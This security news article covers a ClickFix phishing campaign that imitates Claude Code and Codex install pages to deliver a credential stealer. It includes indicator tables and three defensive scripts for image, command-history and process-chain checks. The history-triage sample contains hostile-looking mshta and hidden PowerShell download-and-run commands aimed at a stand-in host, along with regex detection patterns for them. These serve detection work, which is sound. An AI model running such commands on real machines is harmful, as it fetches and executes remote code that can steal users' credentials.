Fake Claude Code and Codex Install Pages on Google Sites Push Credential-Stealing Malware
A new ClickFix-style phishing campaign is impersonating Claude Code and OpenAI Codex to trick developers into running malicious setup instructions. The attack uses Google Sites pages that look like legitimate installation guides, then pushes victims into launching a Windows command that starts a credential-stealing malware chain.
ANY.RUN flagged one Claude-themed lure as malicious in its sandbox analysis, with the page hosted at sites.google.com/view/clau-ver-un-24 and tagged as ClickFix phishing. The campaign targets users who already expect AI coding tools to involve terminal-based setup steps.
The risk is serious because there is no installer file for antivirus or browser download checks to inspect. The victim follows what looks like a routine setup step, and the chain moves into script-based execution that can steal browser data, email credentials, cryptocurrency wallet data, and other sensitive information.
How The Fake Claude Code Installer Attack Works
The campaign uses trusted-looking Google Sites pages to mimic installation pages for developer tools. This makes the lure more convincing because the visible hosting domain belongs to Google, even though the content on the page does not come from Anthropic or OpenAI.
From there, victims are instructed to run a command through Windows utilities. The public ANY.RUN campaign post says the chain uses a user-executed mshta step, multi-stage PowerShell delivery, steganographic payload extraction from an image, in-memory shellcode execution, and exfiltration to attacker-controlled infrastructure.
This approach works because developers often copy terminal commands from documentation. Attackers abuse that habit by making the page look like a routine installation guide instead of a malware delivery page.
Key Details At A Glance
| Item | Detail |
| --- | --- |
| Campaign type | ClickFix social engineering attack |
| Main lure | Fake Claude Code and OpenAI Codex installation pages |
| Hosting abuse | Google Sites pages used to increase trust |
| Initial execution method | User is told to run a Windows command |
| Notable tools abused | mshta.exe and powershell.exe |
| Payload behavior | In-memory stealer execution using staged scripts |
| Data at risk | Browser credentials, email data, and cryptocurrency wallet information |
Why AI Coding Tools Make The Lure More Believable
Claude Code and Codex are both real developer tools, and both are driven from a terminal. That gives attackers a believable cover story when they ask users to paste commands into PowerShell, the Run dialog, or another command-line interface.
Anthropic’s Claude Code quickstart explains that Claude Code works through a terminal and supports several installation methods. OpenAI’s Codex CLI documentation similarly describes Codex as a local terminal-based coding agent that can read, edit, and run code in a selected directory.
That normal developer workflow creates a security gap. A user may trust a command because it resembles real documentation, even when the page itself comes from an unrelated domain or a sponsored search result.
ClickFix Attacks Turn User Trust Into Execution
ClickFix attacks rely on social engineering rather than a traditional software exploit. The attacker convinces the victim to copy and run a command that appears to fix a problem, verify access, or complete an installation.
Trend Micro described a related InstallFix campaign involving fake Claude AI installer pages, Google Ads promotion, malicious PowerShell instructions, mshta.exe abuse, obfuscated scripts, and fileless payload delivery.
The method is effective because the victim performs the most important step for the attacker. Download warnings, SmartScreen and mark-of-the-web checks apply to files the browser saves, not to a command the user types into the Run dialog or a terminal, and in-memory execution through built-in Windows tools leaves few files for scanners to inspect.
Steganography And In-Memory Execution Reduce Visibility
ANY.RUN’s public analysis says the campaign hides part of the payload inside an image and extracts it only during execution. This technique, known as steganography, can reduce obvious file artifacts and make detection harder for teams that rely mainly on static file scanning.
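The page does not publish the embedding scheme this campaign uses, so the following is an added example (not code from the article, ANY.RUN, or the malware) of one check a practitioner can run against images pulled from a suspect download: a walk of the PNG chunk list that reports any bytes after the IEND chunk. Appending a blob after the final chunk is one common way to ride a payload inside an image, because viewers stop reading at IEND while a stager can seek past it. The sample images are constructed inline, and the 16-byte threshold is an assumption chosen to ignore the few bytes some tools leave behind.

```python
"""Report data hidden after the IEND chunk of a PNG (added example).

One steganography-style embedding pattern is a payload appended after the
image's last chunk. Image viewers ignore it; a stager can read it back.
This script rebuilds the chunk list and returns whatever trails IEND.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(appended: bytes = b"") -> bytes:
    """Constructed 1x1 RGB PNG, optionally with `appended` bytes after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    raw = b"\x00" + b"\xff\x00\x00"                      # filter byte + 1 red pixel
    idat = zlib.compress(raw)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + appended)


def trailing_data(png: bytes) -> bytes:
    """Walk the chunk list and return everything after IEND (b"" if clean).

    Malformed input raises ValueError instead of being reported as clean.
    """
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length  # length + type + data + CRC
        if end > len(png):
            raise ValueError("truncated chunk")
        if ctype == b"IEND":
            return png[end:]
        pos = end
    raise ValueError("no IEND chunk")


def scan(png: bytes, min_bytes: int = 16) -> dict:
    """Summarise trailing data; `min_bytes` is an assumed noise threshold."""
    tail = trailing_data(png)
    return {
        "trailing_bytes": len(tail),
        "suspicious": len(tail) >= min_bytes,
        "preview": tail[:16],
    }


if __name__ == "__main__":
    for label, img in (("clean", build_png()),
                       ("stego", build_png(b"PAYLOAD:" + b"A" * 40))):
        print(label, scan(img))
```

A hit from this check is not proof of malice on its own (some editors append metadata), but a trailing blob of any size inside an image that a script-based installer fetched at run time is worth pulling apart before the script that reads it is allowed to run again.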
The ANY.RUN report also shows the Google Sites lure receiving a malicious verdict and ClickFix-related detection. That confirms the campaign uses social engineering first, then script-based execution paths after user action.
Because the activity runs through powershell.exe, which administrators use every day, some network and endpoint tools treat parts of the traffic as normal administrative behavior. Defenders need behavioral rules that detect suspicious process chains and command lines, not just signatures for known malware files.
Why Developers Face Higher Risk
Developers, security researchers, and AI power users frequently install command-line tools. They also work with API keys, Git credentials, package registry tokens, cloud access tokens, SSH keys, and cryptocurrency wallets.
That makes developer machines high-value targets. A single infected workstation can expose personal accounts, work credentials, source code access, cloud environments, and private project data.
The fake pages also benefit from timing. Claude Code, Codex, and similar AI coding agents have become common enough that many users search for installation instructions, compare guides, and follow steps quickly without checking every source.
Indicators And Infrastructure Reported Publicly
| Type | Indicator | Description |
| --- | --- | --- |
| URL | sites.google.com/view/clau-ver-un-24 | Claude-themed Google Sites lure |
| URL | sites.google.com/view/cdx-biz-ver-24 | Codex-themed Google Sites lure reported by ANY.RUN |
| Domain | fairpoint29[.]com | Claude embedded lure domain reported by ANY.RUN |
| Domain | fluxforge97[.]com | Claude embedded lure domain reported by ANY.RUN |
| Domain | freshbase11[.]com | Codex embedded lure domain reported by ANY.RUN |
| Domain | wiseview58[.]com | Codex embedded lure domain reported by ANY.RUN |
| C2 | enhanceblabber[.]cc | Command-and-control domain reported by ANY.RUN |
| Process | mshta.exe | Windows utility abused in the initial execution chain |
| Process | powershell.exe | Used for staged delivery and in-memory activity |
Security teams should treat these indicators as a starting point, not a complete detection strategy. Attackers can rotate domains quickly, especially when they rely on social engineering and trusted hosting platforms.
How To Install Claude Code And Codex Safely
Users should only follow installation steps from official documentation or verified repositories. For Claude Code, users should start with the official Anthropic quickstart guide. For Codex, users should use the official OpenAI Codex CLI page or the linked OpenAI GitHub repository.
Search ads, copied snippets, forum posts, and unofficial setup pages should not be trusted by default. This matters even more when a page asks the user to paste a command into PowerShell, Terminal, or Command Prompt.
- Open official documentation manually instead of clicking sponsored results.
- Check the real browser address bar before running any install step.
- Do not run commands from Google Sites, paste pages, forums, or random blogs.
- Use a test VM or sandbox when evaluating unfamiliar developer tools.
- Keep endpoint protection enabled during installations.
- Rotate exposed API keys and tokens after any suspicious command execution.
- Review shell history for unknown install commands.
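To make the last step concrete, here is an added example (not from the article) that triages PowerShell command history for the patterns seen in copy-paste delivery chains: mshta pointed at a URL, a hidden window, an encoded command, an execution-policy bypass, and download-and-run one-liners. The history path is the default PSReadLine location on Windows and is an assumption about the host; SAMPLE_HISTORY is constructed for the example and contains no real lure command.

```python
"""Triage PowerShell history for ClickFix-style commands (added example)."""
import os
import re

# Default PSReadLine history location on Windows (assumed for this example).
HISTORY_PATH = os.path.expandvars(
    r"%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
)

# (rule name, pattern). (?<!\S) anchors a switch at a token start.
RULES = [
    ("mshta_remote", re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.I)),
    ("hidden_window", re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("encoded_command",
     re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_and_run",
     re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)"
                r"(?=.*\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|"
                r"downloadstring|curl|wget)\b)", re.I)),
    ("policy_bypass", re.compile(r"(?<!\S)-e(?:p|xecutionpolicy)\s+bypass\b", re.I)),
]

# Constructed history lines; example.invalid is a reserved, non-resolving name.
SAMPLE_HISTORY = """\
npm install -g @anthropic-ai/claude-code
git status
mshta http://example.invalid/verify
powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/s.ps1)"
cd ~/projects
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
"""


def triage_line(line: str) -> list:
    """Return the names of every rule that matches one history entry."""
    return [name for name, rx in RULES if rx.search(line)]


def triage_history(lines) -> list:
    """Return (line number, text, matched rules) for each suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        names = triage_line(line)
        if names:
            hits.append((n, line, names))
    return hits


def read_history(path: str = HISTORY_PATH) -> list:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read().splitlines()


if __name__ == "__main__":
    lines = read_history() if os.path.exists(HISTORY_PATH) else SAMPLE_HISTORY.splitlines()
    for n, text, names in triage_history(lines):
        print(f"line {n}: {', '.join(names)}: {text}")
```

A genuine install command, such as the npm line in the sample, matches nothing, while a pasted mshta or encoded PowerShell one-liner lights up several rules at once. Run it from a clean account if the machine is already suspect, since history on a compromised host may have been cleared.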
What Organizations Should Monitor
Companies should look for suspicious parent-child process relationships involving browsers, mshta.exe, powershell.exe, script hosts, and network connections to newly registered or low-reputation domains.
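The following is an added example (not from the article, ANY.RUN, or Trend Micro) of the kind of process-chain rule this paragraph and the earlier "Steganography And In-Memory Execution" section call for. It runs over constructed Sysmon-style telemetry (event 1 = process creation, event 3 = network connection; the field names mirror Sysmon's, the records are made up). Because a pasted command usually runs from the Run dialog or a terminal, the parent of mshta.exe is typically explorer.exe rather than the browser, so the highest-confidence rule keys on mshta.exe spawning powershell.exe; browser ancestry and connections to the domains in the article's indicator table are added as supporting signals.

```python
"""Flag mshta -> powershell chains and lure/C2 contact in telemetry (added example)."""
from collections import defaultdict

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
LOLBINS = SCRIPT_HOSTS | SHELLS
# Domains from the article's indicator table, defanging removed.
KNOWN_BAD_DOMAINS = {
    "fairpoint29.com", "fluxforge97.com", "freshbase11.com",
    "wiseview58.com", "enhanceblabber.cc",
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed Sysmon-style records
    {"id": 1, "pid": 800, "ppid": 600, "image": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 1200, "ppid": 800, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"id": 3, "pid": 1200, "dest_host": "sites.google.com", "dest_port": 443},
    {"id": 1, "pid": 4100, "ppid": 800, "image": r"C:\Windows\System32\mshta.exe"},   # Win+R
    {"id": 3, "pid": 4100, "dest_host": "fairpoint29.com", "dest_port": 443},
    {"id": 1, "pid": 4200, "ppid": 4100, "image": PS},
    {"id": 3, "pid": 4200, "dest_host": "enhanceblabber.cc", "dest_port": 443},
    {"id": 1, "pid": 5000, "ppid": 800, "image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe"},
    {"id": 1, "pid": 5100, "ppid": 5000, "image": PS},                                 # legit install
    {"id": 3, "pid": 5100, "dest_host": "registry.npmjs.org", "dest_port": 443},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events) -> list:
    """Return one alert per script host or shell that trips a rule."""
    procs = {}                      # pid -> (ppid, image name)
    conns = defaultdict(list)       # pid -> [destination hosts]
    for e in events:
        if e["id"] == 1:
            procs[e["pid"]] = (e["ppid"], basename(e["image"]))
        elif e["id"] == 3:
            conns[e["pid"]].append(e["dest_host"].lower())

    def ancestry(pid):
        """Image names from the process up to the root, self first."""
        chain, seen = [], set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            ppid, name = procs[pid]
            chain.append(name)
            pid = ppid
        return chain

    alerts = []
    for pid, (ppid, name) in procs.items():
        if name not in LOLBINS:
            continue
        chain = ancestry(pid)
        parent = procs.get(ppid, (None, None))[1]
        reasons = []
        if name in SHELLS and parent in SCRIPT_HOSTS:
            reasons.append(f"{parent} spawned {name}")
        bad = [h for h in conns[pid] if h in KNOWN_BAD_DOMAINS]
        if bad:
            reasons.append("connection to known lure/C2 domain: " + ", ".join(bad))
        if any(a in BROWSERS for a in chain[1:]):
            reasons.append("script host descended from a browser")
        if reasons:
            alerts.append({"pid": pid, "chain": " -> ".join(reversed(chain)),
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(a["pid"], a["chain"], "|", "; ".join(a["reasons"]))
```

The benign developer flow (terminal, then PowerShell, then the npm registry) produces no alert, while the pasted chain raises two: mshta.exe for contacting a lure domain, and its PowerShell child both for its parent and for the C2 connection. The domain list is only a seed, as the article warns; the parent-child rule keeps working after the attacker rotates infrastructure.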
The ANY.RUN IoC post lists multiple lure and infrastructure domains, while Trend Micro’s Claude Code InstallFix research shows how similar campaigns use fileless delivery, evasion, and attacker-controlled command-and-control servers.
Defenders should also create policies around command-line installs for developer tools. Blocking every script may disrupt engineering teams, but unmanaged copy-paste installation from unknown pages creates unnecessary risk.
FAQ
The campaign is a ClickFix-style malware operation that impersonates Claude Code and OpenAI Codex installation pages. Victims are directed to fake setup pages and told to run commands that start a credential-stealing malware chain.
Google Sites gives the lure a trusted-looking hosting domain. Attackers abuse that trust to make a fake installation page look safer than a random domain would.
The campaign targets sensitive data such as saved browser credentials, email data, cryptocurrency wallet information, and other valuable account or device data available on the victim’s machine.
Users should open official Anthropic or OpenAI documentation directly, avoid sponsored or unfamiliar setup pages, and never paste terminal commands from pages they have not verified.
Anyone who has already run one of these commands should disconnect the device from the network, preserve evidence, scan the system, rotate passwords and API keys from a clean device, review account activity, and ask their security team to check for suspicious PowerShell or mshta activity.